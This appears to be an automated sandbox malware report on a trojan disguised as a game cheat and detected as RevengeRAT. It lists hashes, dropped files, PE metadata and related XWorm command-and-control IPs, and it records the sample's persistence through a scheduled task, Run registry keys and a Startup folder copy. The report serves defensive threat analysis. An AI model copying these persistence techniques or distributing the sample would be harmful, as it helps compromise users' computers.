Overall analysis duration:	0h 10m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	44
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SpeedHack666Cheat (no VM detected).exe
Detection:	MAL
Classification:	mal100.phis.troj.adwa.evad.winEXE@52/16@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 83% Number of executed functions: 1027 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: SpeedHack666Cheat (no VM detected).exe

Simulations

Behavior and APIs

Time	Type	Description
12:27:59	API Interceptor	161759x Sleep call for process: dllhost.exe modified
12:28:21	API Interceptor	32x Sleep call for process: powershell.exe modified
12:28:30	API Interceptor	3x Sleep call for process: svchost.exe modified
18:28:28	Task Scheduler	Run new task: CleanSweepCheck path: C:\ProgramData\dllhost.exe
18:28:41	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 87078a174f1e0ed9d58afdf2d6d178c3 "C:\ProgramData\dllhost.exe" ..
18:28:51	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run 87078a174f1e0ed9d58afdf2d6d178c3 "C:\ProgramData\dllhost.exe" ..
18:29:02	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 87078a174f1e0ed9d58afdf2d6d178c3 "C:\ProgramData\dllhost.exe" ..
18:29:12	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
147.185.221.23	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse
	7yJsmmW4wS.exe	Get hash	malicious	XWorm	Browse
	I8YtUAUWeS.exe	Get hash	malicious	XWorm	Browse
	s3OBQLA3xR.exe	Get hash	malicious	XWorm	Browse
	W1FREE.exe	Get hash	malicious	XWorm	Browse
	x2Yi9Hr77a.exe	Get hash	malicious	XWorm	Browse
	H2f8SkAvdV.exe	Get hash	malicious	Blank Grabber, XWorm	Browse
	A39tzaySzX.exe	Get hash	malicious	AsyncRAT, XWorm	Browse
	H1N45BQJ8x.exe	Get hash	malicious	XWorm	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SALSGIVERUS	mIURiU8n2P.exe	Get hash	malicious	XWorm	Browse	147.185.221.21
	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse	147.185.221.23
	7yJsmmW4wS.exe	Get hash	malicious	XWorm	Browse	147.185.221.23
	I8YtUAUWeS.exe	Get hash	malicious	XWorm	Browse	147.185.221.23
	s3OBQLA3xR.exe	Get hash	malicious	XWorm	Browse	147.185.221.23
	W1FREE.exe	Get hash	malicious	XWorm	Browse	147.185.221.23
	dHp58IIEYz.exe	Get hash	malicious	XWorm	Browse	147.185.221.22
	Lr87y2w72r.exe	Get hash	malicious	XWorm	Browse	147.185.221.18
	7LwVrYH7sy.exe	Get hash	malicious	XWorm	Browse	147.185.221.18
	432mtXKD3l.exe	Get hash	malicious	XWorm	Browse	147.185.221.22

Process:	C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	377856
Entropy (8bit):	5.896394577373872
Encrypted:	false
SSDEEP:	6144:wb8Xw/FxbPPf7QdZE6B5srZP7i+wIUNr4:2/fw5kjwT4
MD5:	65C0F9249F64C65CDA3E5EA32126FC1F
SHA1:	D567A001160109F58A4EC43DB2ABD9971E01AFA7
SHA-256:	7522FA6D0F83EAC9662AE47AF048F02DDFAAB925738CEC1280B0C5C7788D2D0A
SHA-512:	08347609BA2B8BA7A69A147FE7C426BAEBED93F2A9DB3137A9D9EBBC0BF87A775808E55D7C7B7E0B852E8F0065F0204B71FBBADF3CDFFC84B1CBEA21723E0308
Malicious:	true
Yara Hits:	Rule: RevengeRAT_Sep17, Description: Detects RevengeRAT malware, Source: C:\ClickMe.exe, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@.g............................^(... ...@....@.. .......................@...............................................(..K....`..(.................... ....................................................... ............... ..H............text...d.... ...................... ..`.sdata.......@......................@....rsrc...(....`......................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ClickMe.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.35999246155449205
Encrypted:	false
SSDEEP:	6:6xDoaaD0JOCEfMuaaD0JOCEfMKQmDMxDoaaD0JOCEfMuaaD0JOCEfMKQmD:haaD0JcaaD0JwQQnaaD0JcaaD0JwQQ
MD5:	D6D3830984AEC72B32E4EF5030B32290
SHA1:	A645195729EB557B4B773E137AA78ECB17CFB96D
SHA-256:	09BA30C4D4F2F7FEC3C62A7AD0D5103CE6662FDAB91F62803144CCB6B20E4604
SHA-512:	44C27B21C2BB77D57AC1499ABFEB4FA11B45A7EC856276696132498302733B88EE7D748E05ABD6DAC09C8A478CCC803F16A8E1FF7305245F82E382D2617AA69F
Malicious:	false
Preview:	*.>...........~.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................~.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8063181683533969
Encrypted:	false
SSDEEP:	1536:RJszRK0I9i0k0I9wXq0I9UGJC/PQJCmJCovVsnQ9Sii1GY9zOoRXTpMNYpKhvUAm:RJE+Lfki1GjHwU/+vVhWqpb
MD5:	00EB83495939D13B90D0952497BDB350
SHA1:	A802F69AF223E41F316407F5BCA208C11523BDCC
SHA-256:	D45A6DD50DFD1BB1D6CE292892716D1E0C48289D9FF2023F41F216E352AA9E60
SHA-512:	9087BF7C337004D5AC70F5579CF9D56D82E3138AD88F174D29A1C0E1378CB4C9B61C70D1CEBCCB55BE439DEDE8DFED5434FDCCCFA13E135F024089ED8F23DDFC
Malicious:	false
Preview:	..Q^........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.....................................3~L.#.........`h.................h.......1.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x4da422fd, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1048576
Entropy (8bit):	0.7865075502170632
Encrypted:	false
SSDEEP:	1536:DSB2ESB2SSjlK/IECXK0I9XGJCTgzEYkr3g16t2UPkLk+k0+lKuy9nyS2kILzsL6:DazauEezm2U
MD5:	9B903CD037E6DC9AF727115E1666A258
SHA1:	11D03265DCFB7E58680382DC434F28ED8726C04D
SHA-256:	C1F3045C96AE5DE3D20F19DF39BC6C1BA225D2A5442CC5A10FF5A86E9680F7B7
SHA-512:	9B1D4831CAFEEC83B24BCA867C6D0F4333B0E61573EC80F6E60BACFF22B54CF4F991DBD13B0BC2329A1A665499223623B044E17B04EEF76E4400DD950C999627
Malicious:	false
Preview:	M.".... ...............X\...;...{......................0.}...../....\|I......\|..h.z...../....\|I.0.}.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................../....\|I..................DC./....\|I..........................#......0.}.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07954773908727714
Encrypted:	false
SSDEEP:	3:99mEetYeN8rh1rg//zK/YEG0erg//s6hg//Allmn/lZOPp3lll:fUzN8rh1k//zK/YEGBk//sH//AiD
MD5:	EDE171CC66DEA49958F1C8CA09816BBA
SHA1:	CE68FDA264239626B33B1EC9CACDD8E09E550721
SHA-256:	83851C5FDD160794CF3DB0CD3F27A6932885211E8A47839E87123CB01D59DD4D
SHA-512:	BE728C63E88F62455D68DD3B20388DFBEA014697CAF34B585ACDEC46D85788752C3C049BCC31838D0BC5730F202A85C3352AFDFAEE9E00F59770C8B645C12FA0
Malicious:	false
Preview:	y.X......................................;...{.......\|g./....\|I........./....\|../....\|I..c.}/....\|I..................DC./....\|I.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\dllhost.exe

Download File

Process:	C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	377856
Entropy (8bit):	5.896394577373872
Encrypted:	false
SSDEEP:	6144:wb8Xw/FxbPPf7QdZE6B5srZP7i+wIUNr4:2/fw5kjwT4
MD5:	65C0F9249F64C65CDA3E5EA32126FC1F
SHA1:	D567A001160109F58A4EC43DB2ABD9971E01AFA7
SHA-256:	7522FA6D0F83EAC9662AE47AF048F02DDFAAB925738CEC1280B0C5C7788D2D0A
SHA-512:	08347609BA2B8BA7A69A147FE7C426BAEBED93F2A9DB3137A9D9EBBC0BF87A775808E55D7C7B7E0B852E8F0065F0204B71FBBADF3CDFFC84B1CBEA21723E0308
Malicious:	true
Yara Hits:	Rule: RevengeRAT_Sep17, Description: Detects RevengeRAT malware, Source: C:\ProgramData\dllhost.exe, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@.g............................^(... ...@....@.. .......................@...............................................(..K....`..(.................... ....................................................... ............... ..H............text...d.... ...................... ..`.sdata.......@......................@....rsrc...(....`......................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\SpeedHack666Cheat (no VM detected).exe.log

Download File

Process:	C:\Users\user\Desktop\SpeedHack666Cheat (no VM detected).exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	525
Entropy (8bit):	5.259753436570609
Encrypted:	false
SSDEEP:	12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
MD5:	260E01CC001F9C4643CA7A62F395D747
SHA1:	492AD0ACE3A9C8736909866EEA168962D418BE5A
SHA-256:	4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
SHA-512:	01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
Malicious:	true
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dllhost.exe.log

Download File

Process:	C:\ProgramData\dllhost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.259753436570609
Encrypted:	false
SSDEEP:	12:Q3LaJU2C9XAn10Ug+9pfu9t0U29xtUz1B0U2uk71K6xhk7v:MLF2CpI3zffup29Iz52Ve
MD5:	260E01CC001F9C4643CA7A62F395D747
SHA1:	492AD0ACE3A9C8736909866EEA168962D418BE5A
SHA-256:	4BC52CCF866F489772A6919A0CC2C55B1432729D6BDF29E17E5853ABDFAB6030
SHA-512:	01AF7D75257E3DBD460E328F5C057D0367B83D3D9397E89CA3AE54AB9B2842D62352D8CCB4BE98ACE0C5667846759D32C199DE39ECCD0CF9CD6A83267D27E7C4
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\bec14584c93014efbc76285c35d1e891\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\7d443c6c007fe8696f9aa6ff1da53ef7\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\2cdaeaf53e3d49038cf7cb0ce9d805d3\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d0e5535854cce87ea7f2d69d0594b7a8\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2228
Entropy (8bit):	5.3727943569143966
Encrypted:	false
SSDEEP:	48:5WSU4xympjgZ9tz4RIoUl8NPdYl7u1iMugeC/ZUcUyu0lhV:5LHxvCZfIfSKlCOugIt01
MD5:	53697477EC5A86FE3100F599BE388811
SHA1:	2C860005D78CD228FC5D56F31A15A8A134B0AD67
SHA-256:	D312932A65A3368F5BB89A82DE0223C21CE894456838F4DB1E5BF578D0CAA182
SHA-512:	EEB2DBA5DEF79B04B7B8A290AB2FB7EABECE08E30A2E72EF8A280C68DE59822ED2A7B928105480DE00B80CE16ED3B7A3AD5F85407E8416D25E7B0D20D1281448
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....m.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05ntlizv.n2u.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0q45htqt.3kf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ambfhom.u1g.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xsk4bvh1.ler.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe

Download File

Process:	C:\ProgramData\dllhost.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	377856
Entropy (8bit):	5.896394577373872
Encrypted:	false
SSDEEP:	6144:wb8Xw/FxbPPf7QdZE6B5srZP7i+wIUNr4:2/fw5kjwT4
MD5:	65C0F9249F64C65CDA3E5EA32126FC1F
SHA1:	D567A001160109F58A4EC43DB2ABD9971E01AFA7
SHA-256:	7522FA6D0F83EAC9662AE47AF048F02DDFAAB925738CEC1280B0C5C7788D2D0A
SHA-512:	08347609BA2B8BA7A69A147FE7C426BAEBED93F2A9DB3137A9D9EBBC0BF87A775808E55D7C7B7E0B852E8F0065F0204B71FBBADF3CDFFC84B1CBEA21723E0308
Malicious:	true
Yara Hits:	Rule: RevengeRAT_Sep17, Description: Detects RevengeRAT malware, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\87078a174f1e0ed9d58afdf2d6d178c3.exe, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@.g............................^(... ...@....@.. .......................@...............................................(..K....`..(.................... ....................................................... ............... ..H............text...d.... ...................... ..`.sdata.......@......................@....rsrc...(....`......................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.896394577373872
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.69% Win32 Executable (generic) a (10002005/4) 49.64% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% InstallShield setup (43055/19) 0.21% Windows Screen Saver (13104/52) 0.07%
File name:	SpeedHack666Cheat (no VM detected).exe
File size:	377'856 bytes
MD5:	65c0f9249f64c65cda3e5ea32126fc1f
SHA1:	d567a001160109f58a4ec43db2abd9971e01afa7
SHA256:	7522fa6d0f83eac9662ae47af048f02ddfaab925738cec1280b0c5c7788d2d0a
SHA512:	08347609ba2b8ba7a69a147fe7c426baebed93f2a9db3137a9d9ebbc0bf87a775808e55d7c7b7e0b852e8f0065f0204b71fbbadf3cdffc84b1cbea21723e0308
SSDEEP:	6144:wb8Xw/FxbPPf7QdZE6B5srZP7i+wIUNr4:2/fw5kjwT4
TLSH:	9C8484967E0CCF80DECC3070729EB31146679ED263FBD566F946A42D088EBA339AD541
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@.g............................^(... ...@....@.. .......................@.............................................

File Icon


Icon Hash:	0771593d7d79710f

Static PE Info

General

Entrypoint:	0x43285e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x670D40C5 [Mon Oct 14 16:03:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x32810	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x36000	0x2ae28	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x62000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x30864	0x30a00	0a9b75bac3551848a2de35480294d352	False	0.5432398778920309	data	6.077818570965496	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0x34000	0x2b7	0x400	21c5ee9e93d103ca6078436d7fe321d7	False	0.2451171875	MMDF mailbox	2.177680329563669	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x36000	0x2ae28	0x2b000	d84fc288e010bd034110b940ad1eef04	False	0.18543332122093023	data	4.740856602282853	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x62000	0xc	0x200	88f7e8e675bf2e7720b86fc2b64104cd	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
